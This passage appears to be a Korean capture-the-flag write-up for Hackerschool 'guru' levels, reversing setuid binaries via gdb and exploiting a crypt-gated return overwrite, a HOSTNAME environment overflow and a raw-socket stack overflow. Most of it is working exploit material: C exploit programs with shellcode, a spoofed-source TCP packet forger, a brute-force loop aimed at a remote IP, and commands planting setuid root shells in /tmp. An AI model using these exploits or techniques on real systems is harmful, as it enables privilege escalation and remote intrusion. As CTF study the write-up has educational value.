0x0804847e <main+98>:   jmp    0x8048532 <main+278>

 

           return 0;

           }

 

0x08048483 <main+103>:  sub    $0xc,%esp

0x08048486 <main+106>:  push   $0x80485fb                       <--- "\n"

0x0804848b <main+111>:  call   0x804834c <printf>

0x08048490 <main+116>:  add    $0x10,%esp

 

           printf("\n");

 

0x08048493 <main+119>:  jmp    0x80484b1 <main+149>

 

0x08048495 <main+121>:  sub    $0xc,%esp

0x08048498 <main+124>:  push   $0x80485fd

0x0804849d <main+129>:  call   0x804834c <printf>

0x080484a2 <main+134>:  add    $0x10,%esp

 

           printf("Using argv[1]\n")

 

 

0x080484a5 <main+137>:  movl   $0x0,0xfffffff8(%ebp)

 

           ff8 = 0;

 

0x080484ac <main+144>:  jmp    0x8048532 <main+278>

 

           return 0;

 

0x080484b1 <main+149>:  mov    0xc(%ebp),%eax

0x080484b4 <main+152>:  add    $0x8,%eax

 

0x080484b7 <main+155>:  cmpl   $0x0,(%eax)

0x080484ba <main+158>:  je     0x8048532 <main+278>

 

0x080484bc <main+160>:  sub    $0x8,%esp

0x080484bf <main+163>:  mov    0xc(%ebp),%eax             

0x080484c2 <main+166>:  add    $0x8,%eax          <--- argv[2]

 

0x080484c5 <main+169>:  pushl  (%eax)

0x080484c7 <main+171>:  sub    $0xc,%esp

0x080484ca <main+174>:  push   $0x804860c        <--- "sa"

 

0x080484cf <main+179>:  mov    0xc(%ebp),%eax

0x080484d2 <main+182>:  add    $0x4,%eax          <--- argv[1]

0x080484d5 <main+185>:  pushl  (%eax)

0x080484d7 <main+187>:  call   0x804835c <crypt>

0x080484dc <main+192>:  add    $0x14,%esp

 

crypt(argv[1], sa);

 

0x080484df <main+195>:  push   %eax

0x080484e0 <main+196>:  call   0x804831c <strcmp>

0x080484e5 <main+201>:  add    $0x10,%esp

 

strcmp(crypt(argv[1],sa),argv[2])

 

(gdb) x/s $eax

0x40051420 <_ufc_foobar+131200>:         "sa1a7AwhYV8SQ" // AAAA

 

0x080484e8 <main+204>:  test   %eax,%eax

0x080484ea <main+206>:  jne    0x8048532 <main+278>

 

0x080484ec <main+208>:  mov    0xc(%ebp),%eax      

0x080484ef <main+211>:  add    $0xc,%eax         

0x080484f2 <main+214>:  cmpl   $0x0,(%eax)

0x080484f5 <main+217>:  je     0x8048532 <main+278>

 

           if (argv[3] != 0)

           {

 

0x080484f7 <main+219>:  mov    0xc(%ebp),%eax

0x080484fa <main+222>:  add    $0xc,%eax                        <- argv[3]

0x080484fd <main+225>:  mov    (%eax),%eax

0x080484ff <main+227>:  mov    (%eax),%al

0x08048501 <main+229>:  mov    %al,0x4(%ebp)   <- ret[0]

 

           *ret++ = argv[3][0]

 

0x08048504 <main+232>:  mov    0xc(%ebp),%eax   //argv[3]

0x08048507 <main+235>:  add    $0xc,%eax

0x0804850a <main+238>:  mov    (%eax),%eax

0x0804850c <main+240>:  inc    %eax

0x0804850d <main+241>:  mov    (%eax),%al

0x0804850f <main+243>:  mov    %al,0x5(%ebp)

 

           *ret++ = argv[3][1]

 

0x08048512 <main+246>:  mov    0xc(%ebp),%eax

0x08048515 <main+249>:  add    $0xc,%eax

0x08048518 <main+252>:  mov    (%eax),%eax

0x0804851a <main+254>:  add    $0x2,%eax

0x0804851d <main+257>:  mov    (%eax),%al

0x0804851f <main+259>:  mov    %al,0x6(%ebp)

 

           *ret++ = argv[3][2]

 

0x08048522 <main+262>:  mov    0xc(%ebp),%eax

0x08048525 <main+265>:  add    $0xc,%eax

0x08048528 <main+268>:  mov    (%eax),%eax

0x0804852a <main+270>:  add    $0x3,%eax

0x0804852d <main+273>:  mov    (%eax),%al

0x0804852f <main+275>:  mov    %al,0x7(%ebp)

 

           +ret++ = argv[3][3]

           }

 

※ 즉 return address 위치에 argv[3]값을 넣는다.

 

0x08048532 <main+278>:  mov    0xfffffff8(%ebp),%eax

0x08048535 <main+281>:  leave 

0x08048536 <main+282>:  ret   

0x08048537 <main+283>:  nop   

End of assembler dump.

(gdb)

 

gdb로 하나하나 실행해 가면서 소스를 유추한 결과 if(!strcmp(crypt(argv[1], "sa"), argv[2])) 을 만족하면

argv[3]의 내용을 ret에 덮어 써준다는걸 알아낼수 있었다.

 

그렇다면 이렇게 구성하면 성공할 것이다.

 

./program argv[1] argv[1]의crypt값 쉘코드주소

 

 

[guru1@guru QUESTION]$ /tmp/egg               //egg쉘을 띄운후

Using address: 0xbffff088

[guru1@guru QUESTION]$ ./vuln aaaa sa1a7AwhYV8SQ `perl -e 'print "\x98\xf8\xff\xbf"'`

aaaa

$ id

uid=501(guru1) gid=501(guru1) euid=502(guru2) groups=501(guru1)

$

 

guru2의 권한을 얻었다 setreuid를 실행하는 프로그램을 작성하여 완전한 쉘을 얻었다.

 

참고로 위와 같이 완전한 uid를 못 얻은 것은 setreuid 쉘코드 뽑는 것이 귀찮아

ash 쉘을 사용했기 때문이다.

 

즉, /bin/ash 를 /tmp/zz에 복사 해놓고  내가 사용한 egg 쉘 쉘코드에 /bin/sh 대신에 /tmp/zz 이라고 넣어주고

공격을 하게 되면 위와 같이 euid 만 획득하게 된다.

 

main()

{

        setreuid(502, 502);

        system("/bin/sh");

}

~                                 

$ gcc -o setuid setuid.c

$ chmod 4777 setuid

$ ./setuid

 

sh-2.05b$ id

uid=502(guru2) gid=501(guru1) groups=501(guru1)               //guru2 uid얻었다.

 

위와 같이 하여 다시 guru1 문제를 또 풀게 되었다.

 

참고로 다음은 대회가 종료된 후 만들어 본 exploit이다.

 

guru1 exploit

------------------------------------------------------------------

[segovia@LABServer asm]$ vi ex.c

 

#include <stdio.h>

#include <unistd.h>

 

#define BUFSIZE 4+1

#define TARGET "./guru1"

 

/* setreuid shellcode 53 byte */

char shellcode[]=

        "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c"

        "\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb"

        "\x89\xd8\x40\xcd\x80\xe8\xdc\xff\xff\xff/tmp/zz";

 

int main() {

 

char *env[3] = {shellcode, NULL};

char buff[BUFSIZE];

char *crypt_data;

char *p;

long ret;

 

system("/bin/cp /bin/ash /tmp/zz");

 

crypt_data = crypt(TARGET, "sa");

 

ret = 0xbffffffa - strlen(shellcode) - strlen(TARGET);

 

p =buff;

*(long *)p = ret;

buff[4] = '0';

 

printf("\n============================\n");

printf("Hackerschool guru1 exploit\n");

printf("============================\n");

printf("Argv[1] data  = %s\n",TARGET);

printf("crpyt result  = %s\n",crypt_data);

printf("Shell Address = %p\n",ret);

printf("exploit......................\n\n");

 

execle(TARGET,TARGET, TARGET, crypt_data, buff, NULL, env);

}

~

~

"ex.c" 38L, 876C 저장 했습니다

[segovia@LABServer asm]$ gcc -o ex ex.c -lcrypt

ex.c: In function `main':

ex.c:23: warning: assignment makes pointer from integer without a cast

[guru1@guru test]$ ./ex

 

============================

Hackerschool guru1 exploit

============================

Argv[1] data  = ./guru1

crpyt result  = saUABB7pE5YEw

Shell Address = 0xbfffffc6

exploit......................

 

$ id

uid=501(guru1) gid=501(guru1) euid=502(guru2) groups=501(guru1)

 

 

━━━━━━━━━━━━━━━━━━━━━━━
 :: Guru2 – bof ::

━━━━━━━━━━━━━━━━━━━━━━━

 

 

root 문제에 집중해 있던 중 source 가 나왔다길래 얼릉 한번 풀어보기로 했다.

 

[root@LABServer newager]$ ssh guru2@guru.hackerschool.org

guru2@guru.hackerschool.org's password:

[guru2@guru guru2]$ ls

QUESTION

[guru2@guru guru2]$ cd QUESTION/

[guru2@guru QUESTION]$ ls

vuln  vuln.c

[guru2@guru QUESTION]$ ls -al

합계 28

drwxr-xr-x    2 root     root         4096  6 28 08:39 .

drwxr-x---    3 root     guru2        4096  6 27 12:44 ..

-r-sr-x---    1 guru3    guru2       12376  6 28 08:39 vuln

-rw-r--r--    1 root     root          489  6 28 08:39 vuln.c

 

[guru2@guru QUESTION]$ cat vuln.c

#include <stdio.h>

#include <stdlib.h>

main(int argc, char *argv[])

{

 

             char count, temp[222];

            

             char *user;

            

             char max[100];

            

             count=strlen(getenv("HOSTNAME"));

 

             if(count>100)

             {

              printf(" * yo check it out!\n");

              return 0;

             }

             user=malloc(strlen(getenv("HOSTNAME")));

             strncpy(max, getenv("HOSTNAME"), strlen(getenv("HOSTNAME")));

             strcpy(user, getenv("HOSTNAME"));

            

             printf("\n\n\t- Hackerschool Hacking Server\n");

             printf("\t- Server Info \n\n\n");

             printf("\tHOSTNAME : %s\n\n", user);

}

[guru2@guru QUESTION]$

 

문제의 소스이다.

 

환경변수 HOSTNAME을 읽어서 strcpy하는 과정에서 bof가 일어나는 프로그램이다.

프로그램 상에서 HOSTNAME의 길이를 체크하긴 하지만 그 변수가 char형이어서

char : -128~127 인 관계로 127이 넘어가면 다시 -128이 되어버리기 때문에 회피할 수 있다.

 

ex)

126   = 01111110

127   = 01111111

-128  = 10000000

 

또 하나의 문제점은 strncpy에서 bof가 일어난 다음에 *user가 가리키는 주소가 바뀌어 버리기 때문에

포인터 user로 strcpy하는 과정에서 세그먼트 폴트가 발생한다.

bof시에 user변수 부분을 지날 때 아무 힙 영역이나 egg쉘과 상관없는 buf 영역을 넣어주면 무리없이 실행된다.

 

 

[guru2@guru tmp]$ ./egg

Using address: 0xbffff848

[guru2@guru guru2]$ cd QUESTION

[guru2@guru QUESTION]$ export HOSTNAME=`perl -e \

'print "\x98\xf8\xff\xbf"x20,"\xb8\x9a\x04\x08"x20,"\x89\xf8\xff\xbf"x70'`

 

HOSTNAME을 [buf를 채우는값, user부분을 덮을 의미없는 heap영역, ret를 덮을 egg쉘의 주소] 형태로 구성해주고

./vuln을 실행하였다.

 

[guru2@guru QUESTION]$ ./vuln

 

 

        - Hackerschool Hacking Server

        - Server Info

 

 

        HOSTNAME : 섢퓲?퓲?퓲?퓲?퓲?퓲?퓲?퓲?퓲?퓲?퓲?퓲?퓲?퓲?퓲?퓲?퓲?퓲?퓲?옇만만만만만만만만만툒?퓠?퓠?

퓠?퓠?퓠?퓠?퓠?퓠?퓠?퓠?퓠?퓠?퓠?퓠?퓠?퓠?퓠?퓠?퓠?퓠?퓠?퓠?퓠?퓠?퓠?퓠?퓠?퓠?퓠?퓠?퓠?퓠?퓠?퓠?퓠?퓠?퓠?퓠?

퓠?퓠?퓠?퓠?퓠?퓠?퓠?퓠?퓠?퓠?퓠?퓠?퓠?퓠?퓠?퓠?퓠?퓠?퓠?퓠?퓠?퓠?퓠?퓠?퓠?퓠?퓠?퓠?퓠?퓠?퓠??

$ id

uid=502(guru2) gid=502(guru2) euid=503(guru3) groups=502(guru2)               //guru3의 권한을 얻었다.

$

 

쉽게 guru3의 권한을 얻었다.

 

그리고 다음 역시 대회가 종료된 후에 만들어 본 exploit이다.

 

guru2 exploit

----------------------------------------------------------------

 

#include <stdio.h>

 

#define BUFSIZE 372+9+1

#define TARGET "./guru2"

 

/* setreuid shellcode 53 byte */

char shellcode[]=

        "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c"

        "\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb"

        "\x89\xd8\x40\xcd\x80\xe8\xdc\xff\xff\xff/tmp/zz";

 

char hostname[BUFSIZE];

 

int main() {

 

int i;

char *env[3] = {hostname, shellcode , NULL};

char *p;

long stackstart=0x080497a0;  // not use address

long ret;

 

system("/bin/cp /bin/ash /tmp/zz");

 

ret = 0xbffffffa - strlen(shellcode) - strlen(TARGET);

 

printf("Shell Address = %p\n", ret);

 

p = hostname;

memcpy(p, "HOSTNAME=", 9);

p+=9;

 

for(i=0; i<BUFSIZE-4-1; i+=4)

{

        *(long *)p=stackstart;

        p+=4;

}

 

*(long *)p = ret;

p+=4;

*p = '\0';

 

execle(TARGET,TARGET,NULL, env);

}

 

[segovia@LABServer asm]$ gcc -o guru2ex guru2ex.c

[segovia@LABServer asm]$ ./guru2ex

Shell Address = 0xbfffffc6

 

 

        - Hackerschool Hacking Server

        - Server Info

 

 

        HOSTNAME : 젨젨젨젨젨젨젨젨젨젨젨젨젨젨젨젨젨젨젨젨젨젨젨젨젨젨젨젨젨졚?

 

$

 

 

$ id

uid=502(guru2) gid=502(guru2) euid=503(guru3) groups=502(guru2)

 

 

━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━
 :: Guru3  – root를 향하여 Raw socket bof ::

━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━

 

 

실행화일에 읽기 권한이 있어 소스를 분석하고 있었다.

 

[segovia@LABServer segovia]$ cat dump

0x0804849c <main+0>:    push   %ebp

0x0804849d <main+1>:    mov    %esp,%ebp

0x0804849f <main+3>:    sub    $0xc8,%esp

 

int sd;

char *ff40;

char buf[200];

 

// fff4, fff8, fffc, ebp, ret

 

char ffd8

int *ffd4

int *ffd0

char ff58[100];

 

ff4c

ff48

ff44

 

char ff40

 

 

0x080484a5 <main+9>:    and    $0xfffffff0,%esp

0x080484a8 <main+12>:   mov    $0x0,%eax

0x080484ad <main+17>:   sub    %eax,%esp

0x080484af <main+19>:   lea    0xffffff58(%ebp),%eax

0x080484b5 <main+25>:   add    $0x14,%eax

0x080484b8 <main+28>:   mov    %eax,0xffffff44(%ebp)

 

ff44 = 20;

 

0x080484be <main+34>:   lea    0xffffff58(%ebp),%eax

0x080484c4 <main+40>:   add    $0x28,%eax

0x080484c7 <main+43>:   mov    %eax,0xffffff40(%ebp)

 

 

ff40 = 0x28;

 

0x080484cd <main+49>:   sub    $0x4,%esp

0x080484d0 <main+52>:   push   $0x6

0x080484d2 <main+54>:   push   $0x3

0x080484d4 <main+56>:   push   $0x2

0x080484d6 <main+58>:   call   0x80483cc <socket>

0x080484db <main+63>:   add    $0x10,%esp

 

 

0x080484de <main+66>:   mov    %eax,0xffffffd4(%ebp)

 

ffd4 = socket(2,3,6);

 

0x080484e1 <main+69>:   movl   $0x10,0xffffffd0(%ebp)

0x080484e8 <main+76>:   sub    $0x8,%esp

0x080484eb <main+79>:   lea    0xffffffd0(%ebp),%eax

0x080484ee <main+82>:   push   %eax

0x080484ef <main+83>:   lea    0xffffff48(%ebp),%eax

0x080484f5 <main+89>:   push   %eax

0x080484f6 <main+90>:   push   $0x0

0x080484f8 <main+92>:   push   $0x64

0x080484fa <main+94>:   lea    0xffffff58(%ebp),%eax

0x08048500 <main+100>:  push   %eax

0x08048501 <main+101>:  pushl  0xffffffd4(%ebp)

0x08048504 <main+104>:  call   0x804835c <recvfrom>

0x08048509 <main+109>:  add    $0x20,%esp

 

recvfrom(sd, buf, 100, 0, 받는주소, 0x10);

 

recvfrom(ffd4, ff58, 0x64(100), flag(0), ff48(addr), ffd0(length));

 

 

0x0804850c <main+112>:  sub    $0x8,%esp

0x0804850f <main+115>:  push   $0x804863c

0x08048514 <main+120>:  pushl  0xffffff4c(%ebp)

0x0804851a <main+126>:  call   0x804838c <inet_ntoa>

0x0804851f <main+131>:  add    $0x4,%esp

 

if(!strcmp(inet_ntoa(ff4c), "123.234.123.234")) {

 

0x08048522 <main+134>:  push   %eax

0x08048523 <main+135>:  call   0x804836c <strcmp>

0x08048528 <main+140>:  add    $0x10,%esp

 

 

0x0804852b <main+143>:  test   %eax,%eax

0x0804852d <main+145>:  jne    0x80484e8 <main+76>

 

0x0804852f <main+147>:  sub    $0xc,%esp

0x08048532 <main+150>:  push   $0x804864c

0x08048537 <main+155>:  call   0x80483bc <printf>

0x0804853c <main+160>:  add    $0x10,%esp

 

printf("This is correct IP address\n");

 

0x0804853f <main+163>:  mov    0xffffff44(%ebp),%eax

0x08048545 <main+169>:  movzwl 0x2(%eax),%eax

0x08048549 <main+173>:  sub    $0xc,%esp

0x0804854c <main+176>:  push   %eax

0x0804854d <main+177>:  call   0x804839c <ntohs>

0x08048552 <main+182>:  add    $0x10,%esp

 

if(ntohs(ff44) ==777) {

 

0x08048555 <main+185>:  cmp    $0x309,%ax

0x08048559 <main+189>:  jne    0x80484e8 <main+76>

0x0804855b <main+191>:  sub    $0xc,%esp

0x0804855e <main+194>:  push   $0x804865e

0x08048563 <main+199>:  call   0x80483bc <printf>

0x08048568 <main+204>:  add    $0x10,%esp

 

printf("I received attacker's packet.\n");

 

0x0804856b <main+207>:  call   0x804837c <fork>

0x08048570 <main+212>:  test   %eax,%eax

0x08048572 <main+214>:  jne    0x80484e8 <main+76>

 

if(!fork()) {

strcpy(ffd8, ff40);

}

 

0x08048578 <main+220>:  sub    $0x8,%esp

0x0804857b <main+223>:  pushl  0xffffff40(%ebp)

0x08048581 <main+229>:  lea    0xffffffd8(%ebp),%eax

0x08048584 <main+232>:  push   %eax

0x08048585 <main+233>:  call   0x80483dc <strcpy>

0x0804858a <main+238>:  add    $0x10,%esp

 

strcpy(ffd8, ff40);

 

0x0804858d <main+241>:  leave 

0x0804858e <main+242>:  ret   

0x0804858f <main+243>:  nop   

End of assembler dump.

 

그러던 중에 소스가 공개 되었다.

 

------------------vuln.c-------------------------------------------

#include <stdio.h>

#include <sys/socket.h>

#include <sys/types.h>

#include <arpa/inet.h>

#include <linux/ip.h>

#include <linux/tcp.h>

#include <dumpcode.h>

 

int main() {

 

             char buffer[20];

             int recv_socket, len; char recv_packet[100];

             struct sockaddr_in          target_address;

             struct tcphdr *tcp_header; // tcp 헤더 구조체의 포인터 변수 struct iphdr

 

             tcp_header = (struct tcphdr *)(recv_packet + 20);  // ip 헤더 뒤쪽 부분을 가리키도록 .

             char *string = recv_packet+40;      // data 부분을 가리키도록 .

             recv_socket = socket( AF_INET, SOCK_RAW, IPPROTO_TCP );

             len = sizeof( target_address );

 

             while(1){

                           recvfrom( recv_socket, recv_packet, 100, 0, (struct sockaddr *)&target_address, &len );

                           // 발신자의 IP가 123.234.123.234과 같은지 검사.

                     if( strcmp( inet_ntoa(target_address.sin_addr), "123.234.123.234" ) == 0 ){

                                        printf("This is correct IP address\n");

                                        // 접속 포트가 777와 같은지 검사.

                                        if( ntohs(tcp_header->dest) == 777 ){

                                                     printf( "I received attacker's packet.\n" );

                                                     if(fork()==0){

                                                                  dumpcode(string, 48);

                                                                  printf("\n\n");

                                                                  strcpy(buffer, string);

                                                                  break;

                                                     }

                                        }

                           }

             }

}

 

raw socket 문제이다 source address 123.234.123.234 이어야 하고 destination port 777이어야 패킷을 받는다

패킷을 받는 과정에서 buffer 오버해서 ret바꿀수 있다.

 

문제는 /home/guru3/QUESTION/vuln 실행파일이 있고 실행 권한도 있지만 setuid비트가 없어서 정상적으로

실행이 안된다는 것이다. 즉 패킷이 전달되는 과정을 자세히 보아야 할 것 같은데 그럴 수가 없었다.

(raw소켓은 root권한으로만 열림)

 

하지만 이미 소켓은 root권한으로 열려 있는 상태였다.

 

아래와 같은 raw socket sender를 작성해서 패킷을 보내 보았다.

 

=====================raw socker sender(go.c)=====================

#include <stdio.h>

#include <stdlib.h>

#include <sys/socket.h>

#include <netdb.h>

#include <arpa/inet.h>

#include <linux/ip.h>

#include <linux/tcp.h>

#include <errno.h>

#include <string.h>

#include <sys/types.h>

#include <netinet/in.h>

 

unsigned short in_cksum(unsigned short *ptr, int nbytes)

{

        register long           sum;

        u_short                 oddbyte;

        register u_short        answer;

 

        sum = 0;

        while (nbytes > 1)  {

                sum += *ptr++;

                nbytes -= 2;

        }

 

        if (nbytes == 1) {

                oddbyte = 0;

                *((u_char *) &oddbyte) = *(u_char *)ptr;

                sum += oddbyte;

        }

 

        sum  = (sum >> 16) + (sum & 0xffff);

        sum += (sum >> 16);

        answer = ~sum;

        return(answer);

}

 

unsigned int host_convert(char *hostname)

{

   static struct in_addr i;

   struct hostent *h;

   i.s_addr = inet_addr(hostname);

   if(i.s_addr == -1)

   {

      h = gethostbyname(hostname);

      if(h == NULL)

      {

         fprintf(stderr, "cannot resolve %s\n", hostname);

         exit(0);

      }

      bcopy(h->h_addr, (char *)&i.s_addr, h->h_length);

   }

   return i.s_addr;

}

 

main(int argc, char **argv)

{

   struct send_tcp

   {

      struct iphdr ip;

      struct tcphdr tcp;

      char buffer[100];

   } send_tcp;

 

   struct pseudo_header

   {

      unsigned int source_address;

      unsigned int dest_address;

      unsigned char placeholder;

      unsigned char protocol;

      unsigned short tcp_length;

      struct tcphdr tcp;

   } pseudo_header;

 

   int send_socket;

   struct sockaddr_in sin;

   unsigned int s_host;

   unsigned int d_host;

   unsigned short s_port;

   unsigned short d_port;

 

  if(argc < 6 ) {

        printf("Usage: %s dest_ip dest_port src_ip src_prot messages\n",argv[0]);

        exit(1);

   }

 

   bzero(send_tcp.buffer,100);

   d_host=host_convert(argv[1]);

   d_port=atoi(argv[2]);

   s_host=host_convert(argv[3]);

   s_port=atoi(argv[4]);

 

   sleep(1);

 

   send_tcp.ip.ihl = 5;

   send_tcp.ip.version = 4;

   send_tcp.ip.tos = 0;

   send_tcp.ip.tot_len = htons(40);

   send_tcp.ip.id =0xffff;

   send_tcp.ip.frag_off = 0;

   send_tcp.ip.ttl = 64;

   send_tcp.ip.protocol = IPPROTO_TCP;

   send_tcp.ip.check = 0;

   send_tcp.ip.saddr = s_host;

   send_tcp.ip.daddr = d_host;

   send_tcp.tcp.source = htons(s_port);

   send_tcp.tcp.seq = 0xffffffff;

   send_tcp.tcp.dest = htons(d_port);

   send_tcp.tcp.ack_seq = 0;

   send_tcp.tcp.res1 = 0;

   send_tcp.tcp.doff = 5;

   send_tcp.tcp.fin = 0;

   send_tcp.tcp.syn = 1;

   send_tcp.tcp.rst = 0;

   send_tcp.tcp.psh = 0;

   send_tcp.tcp.ack = 0;

   send_tcp.tcp.urg = 0;

   send_tcp.tcp.window = htons(512);

   send_tcp.tcp.check = 0;

   send_tcp.tcp.urg_ptr = 0;

   strcpy(send_tcp.buffer,argv[5]);

  

   sin.sin_family = AF_INET;

   sin.sin_port = send_tcp.tcp.source;

   sin.sin_addr.s_addr = send_tcp.ip.daddr;  

  

   send_socket = socket(AF_INET, SOCK_RAW, IPPROTO_RAW);

   if(send_socket < 0)

   {

      perror("s sock can't open");

      exit(1);

   }

 

      send_tcp.ip.check = in_cksum((unsigned short *)&send_tcp.ip, 20);

      pseudo_header.source_address = send_tcp.ip.saddr;

      pseudo_header.dest_address = send_tcp.ip.daddr;

      pseudo_header.placeholder = 0;

      pseudo_header.protocol = IPPROTO_TCP;

      pseudo_header.tcp_length = htons(20);

 

      bcopy((char *)&send_tcp.tcp, (char *)&pseudo_header.tcp, 20);

      send_tcp.tcp.check = in_cksum((unsigned short *)&pseudo_header, 32);

      sendto(send_socket, &send_tcp, 40+strlen(send_tcp.buffer), 0, (struct sockaddr *)&sin, sizeof(sin));

     

      sendto(send_socket, &send_tcp, 40+strlen(send_tcp.buffer), 0, (struct sockaddr *)&sin, sizeof(sin));           

 

  close(send_socket);

 

}

 

소스에 dumpcode도 있고 패킷을 받았는지를 확인해주는 출력문이 있지만 프로그램을 실행한 root의 터미널에

출력되므로그것을 볼수 있는 방법이 없었다.

그래서 이 문제 역시 내 테스트 서버로 카피해와서 테스트 하기 시작했다.

 

[root@LABServer school]# ./vuln                            <---vuln 실행

 

터미널을 하나 더 띄워서 raw socket sender 프로그램으로 패킷을 보냈다.

 

------------------------------클라이언트측 터미널---------------------------

[root@LABServer school]# gcc -o go go.c

[root@LABServer school]# ./go

Usage: ./go dest_ip dest_port src_ip src_port messages

[root@LABServer school]# ./go 127.0.0.1 777 123.234.123.234 999 testmessage

// "testmessage" source address 123.234.123.234로 해서 777 포트로 보냈다.

[root@LABServer school]#

 

--------------------------------서버측-----------------------------------

[newager@LABServer school]$ su

Password:

[root@LABServer school]# ./vuln

This is correct IP address

I received attacker's packet.

 

0xbffffb20  74 65 73 74 6d 65 73 73 61 67 65 40 75 fc ff bf   testmessage@u...

0xbffffb30  94 fb ff bf 14 fb ff bf c0 bc 00 bf 2a 88 04 08   ............*...

0xbffffb40  c0 b1 15 40 60 53 01 40 68 fb ff bf 17 a9 03 40   ...@`S.@h......@

                                                return address

 

recv_packet[100]

0xbffffaa0  45 00 00 33 ff ff 00 00 40 06 03 f0 7b ea 7b ea   E..3....@...{.{.

0xbffffab0  7f 00 00 01 03 e7 03 09 ff ff ff ff 00 00 00 00   ................

0xbffffac0  50 82 02 00 2f 9d 00 00 74 65 73 74 6d 65 73 73   P.../...testmess

0xbffffad0  61 67 65 40 75 fc ff bf 94 fb ff bf 14 fb ff bf   age@u...........

0xbffffae0  c0 bc 00 40 7f 03 00 00 01 00 00 00 00 f5 09 40   ...@...........@

0xbffffaf0  7f 80 00 40 2c 58 01 40 5c 00 00 00 38 5a 01 40   ...@,X.@\...8Z.@

0xbffffb00  50 fb ff bf

 

testmessage가 성공적으로 전송된 것을 알 수 있다.

 

위 부분에서 중요한 내용은 노란색으로 되어 있는 부분으로 그곳이 return address 가 있는 곳이다.

즉 텍스트 데이터를 48바이트만 입력하게 되면 ret를 덮을 수 있게 되는 것이다.

 

즉 recv_packet[100] 바이트 중 앞부분 40바이트는 raw socket 해더 부분이고 뒤에 60바이트에

내가 원하는 값을 넣을 수 있게 된다.

 

Bind 쉘은 너무 크기 때문에 해당 소스를 위한 공격으로는 적합하지 않다.

하지만 이미 우리는 로컬에 접속이 가능한 상태 이므로 로컬에서 약간의 작업을 해 준 후 그작업을

수행하는 쉘을 하나 만들면 될 듯하다.  

 

44 바이트 후에 ret를 덮어야 하므로 44바이트안에 쉘코드를 넣어줘야 한다.

39바이트 짜리 쉘을 이용했다.

 

Nop 5바이트 + 쉘코드 39 + ret 를 넣어줘보자

 

먼저

 

nz.c

#include <stdio.h>

 

main()

{

         system("cp /bin/ash /tmp/zz");

system(/bin/chmod 6777 /tmp/zz);

 }

 

ash 파일을 하나 tmp 밑에 복사를 하고 그곳에 setuid 비트를 걸어주는 코딩을 하나 해놓고

쉘코드가 그넘을 실행하도록 해주자.

              }

------------------------------클라이언트측 터미널---------------------------

[root@LABServer school]# gcc -o go go.c

[root@LABServer school]# ./go

Usage: ./go dest_ip dest_port src_ip src_port messages

[root@LABServer school]# ./go 127.0.0.1 777 123.234.123.234 777 `perl -e 'print "\x90\x90\x90\x90\x90\xeb\x19\x5e\x89\x76\x08\x31\xc0\x89\x46\x0c\x88\x46\x07\x8b\x5e

\x08\x8d\x4e\x08\x8b\x56\x0c\xb0\x0b\xcd\x80\xe8\xe2\xff\xff\xff/tmp/nz","\x24\xfb\xff\xbf"'`

[root@LABServer school]#  

 

--------------------------------서버측--------------------------------------

 

This is correct IP address

I received attacker's packet.

 

0xbffffb20  90 90 90 90 90 eb 19 5e 89 76 08 31 c0 89 46 0c   .......^.v.1..F.

0xbffffb30  88 46 07 8b 5e 08 8d 4e 08 8b 56 0c b0 0b cd 80   .F..^..N..V.....

0xbffffb40  e8 e2 ff ff ff 2f 74 6d 70 2f 6e 7a 24 fb ff bf   ...../tmp/nz$...

 

0xbffffaa0  45 00 00 58 ff ff 00 00 40 06 03 cb 7b ea 7b ea   E..X....@...{.{.

0xbffffab0  7f 00 00 01 03 09 03 09 ff ff ff ff 00 00 00 00   ................

0xbffffac0  50 82 02 00 30 7b 00 00 90 90 90 90 90 eb 19 5e   P...0{.........^

0xbffffad0  89 76 08 31 c0 89 46 0c 88 46 07 8b 5e 08 8d 4e   .v.1..F..F..^..N

0xbffffae0  08 8b 56 0c b0 0b cd 80 e8 e2 ff ff ff 2f 74 6d   ..V........../tm

0xbffffaf0  70 2f 6e 7a 24 fb ff bf 5c 00 00 00 38 5a 01 40   p/nz$...\...8Z.@

0xbffffb00  50 fb ff bf

 

정확히 return address 의 위치에 0xbffffb24 가 들어갔다. 정상적으로 되었다면 /tmp 밑에

setuid 쉘이 만들어져 있을 것이다.

 

[root@LABServer tmp]# ls -al zz

-rwsrwsrwx    1 root     root        92444  6월 29 17:40 zz

[root@LABServer tmp]#

 

보는 바와 같이 setuid 쉘이 만들어 졌다.

로컬에서는 이렇게 성공을 하였으나 리모트에서는 덤프를 확인 할 수가 없어 주소 찍기가 어렵다.

 

하지만 ret address 가 항상 \xc에서부터 시작하기 때문에 계산을 해보면 쉘의 시작 위치는

x4부터 시작된다.

 

그래서 공격툴을 하나 만들어서 공격을 시작했다.

 

[guru3@guru tmp]$ cat nz.c

 

main()

{

        system("cp /bin/ash /tmp/end");

        system("chmod 6777 /tmp/end");

}

 

==========자동화 공격툴 =======================

[root@LABServer school]# vi auto.c

 

#include <stdio.h>

#include <stdlib.h>

 

int main()

{

        char cmd[1024];

        int num1, num2;

        for(num1=0x04; num1<=0xff; num1+=4) {

                for(num2=0xf0; num2<=0xff; num2++) {

                        sprintf(cmd, "./go 218.149.4.32 777 123.234.123.234 777 `perl -e 'print \"\\x90\\x90\\x90\\x90\\x90\\xeb\\x19\\x5e\\x89\\x76\\x08\\x31\\xc0\\x89\\x46\\x0c\\x88\\x46\\x07\

\x8b\\x5e\\x08\\x8d\\x4e\\x08\\x8b\\x56\\x0c\\xb0\\x0b\\xcd\\x80\\xe8\\xe2\\xff\\xff\\xff/tmp/nz\",

\"\\x%02x\\x%02x\\xff\\xbf\"'`", num1, num2);

                        fprintf(stderr, "attack string : %s", cmd);

                        system(cmd);

                }

        }

}

 

 

[root@LABServer school]# ./auto

attack string : ./go 218.149.4.32 777 123.234.123.234 777 `perl -e 'print "\x90\x90\x90\x90\x90\xeb\x19\x5e\x89\x76\x08\x31\xc0\x89\x46\x0c\x88\x46\x07\x8b\x5e

\x08\x8d\x4e\x08\x8b\x56\x0c\xb0\x0b\xcd\x80\xe8\xe2\xff\xff\xff/tmp/nz","\x04\xf0\xff\xbf"'`

attack string : ./go 218.149.4.32 777 123.234.123.234 777 `perl -e 'print "\x90\x90

